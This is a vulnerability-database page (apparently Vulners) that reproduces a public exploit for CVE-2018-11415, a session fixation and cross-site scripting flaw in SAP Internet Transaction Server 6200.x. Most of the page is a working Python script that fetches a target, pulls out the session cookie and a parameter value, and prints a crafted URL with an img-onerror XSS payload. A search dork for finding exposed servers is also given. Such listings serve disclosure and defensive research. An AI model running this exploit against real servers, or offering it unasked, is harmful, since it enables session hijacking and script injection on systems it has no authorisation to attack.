Vulners
Lucene search
SAP Internet Transaction Server 6200.x - Session Fixation / Cross-Site Scripting
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | SAP Internet Transaction Server Cross-Site Scripting Vulnerability | 28 May 201800:00 | – | cnvd |
 | CVE-2018-11415 | 24 May 201819:00 | – | cve |
 | CVE-2018-11415 | 24 May 201819:00 | – | cvelist |
 | EUVD-2018-3446 | 7 Oct 202500:30 | – | euvd |
 | SAP Internet Transaction Server 6200.x - Session Fixation Cross-Site Scripting | 25 May 201800:00 | – | exploitpack |
 | CVE-2018-11415 | 24 May 201819:29 | – | nvd |
 | SAP Internet Transaction Server 6200.x Session Fixation / Cross Site Scripting | 25 May 201800:00 | – | packetstorm |
 | Cross site scripting | 24 May 201819:29 | – | prion |
# Exploit Title: SAP Internet Transaction Server (ITS) 6200.X.X - Session Fixation/ Cross-Site Scripting
# Dork: /scripts/wgate/
# Date: 25.05.2018
# Exploit Author: J. Carrillo Lencina (0xd0m7)
# Vendor Homepage: https://www.sap.com
# Version: SAP ITS 6200.X.X
# Category: Webapps
# Tested on: All Platforms
# CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11415
# Description:As it has been determined that there are two
vulnerabilities in the latest developed version of SAP ITS, these two
vulnerabilities added together give rise to an XSS.
#Technical details: It has been determined that when an unauthenticated
user navigates through the application, the application assigns a cookie,
that cookie is assigned in the parameter ~ session, therefore it could be
possible for an attacker to fix the fallo ~ session through a request GET
This, together with the fact that the parameter SERVICEUNIQUE has a
parameter validation failure, results in a single-use XSS, since the
session expires once the method of the request is exchanged and fixed in
the URL.
#Exploit
#!/usr/bin/python
import argparse
import requests
import re
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Example: https://example.com/wgate/scripts/ralp/!")
args = parser.parse_args()
list=[]
i=0
cookie={'s_fid':'3B9C1B379A11790F-00A298287FA44BF5','s_lv':'1524222141316', 's_nr':'1524222141322-New', 's_vnum':'1555758141333%26vn%3D1'}
url=args.url.split('/')
url2='https://'+str(url[2])+'/'+str(url[3])+'/'+str(url[4])+'/'
if args.url:
r = requests.get(args.url,verify=False,cookies=cookie)
header = r.headers['Set-Cookie']
cookie_val = header.split(";")
for line in r.iter_lines():
list.append(line)
i=i+1
if line.find('~SERVICEUNIQUE') > 0:
param = line.replace('"','')
v = param.split('=')
val0 = v[3].split(' ')
print '[+]Random Value:',val0[0]
for line2 in range(len(cookie_val)):
if cookie_val[line2].find('~session') == 0:
val1 = cookie_val[line2].split('=')
print '[+]Session Value:',val1[1]
print '[+] Vulnerable URL:'+url2+val0[0]+'%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e/?%7ESERVICEUNIQUE='+val0[0]+'%3cimg%20src%3da%20onerror%3dalert(1)%3e&%7Eclientinput=1&%7Elogininput=1&%7Epasswdinput=1&%7Eclient=100&%7Elogin=%3F&%7Epassword=aaaaa&%7EPOV=P&%7EOkCode%3D%2F0=Entrar&~session='+val1[1]
else:
print '[!] Empty URL, please see help (-h,--help)'Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 May 2018 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 36.1
EPSS0.02523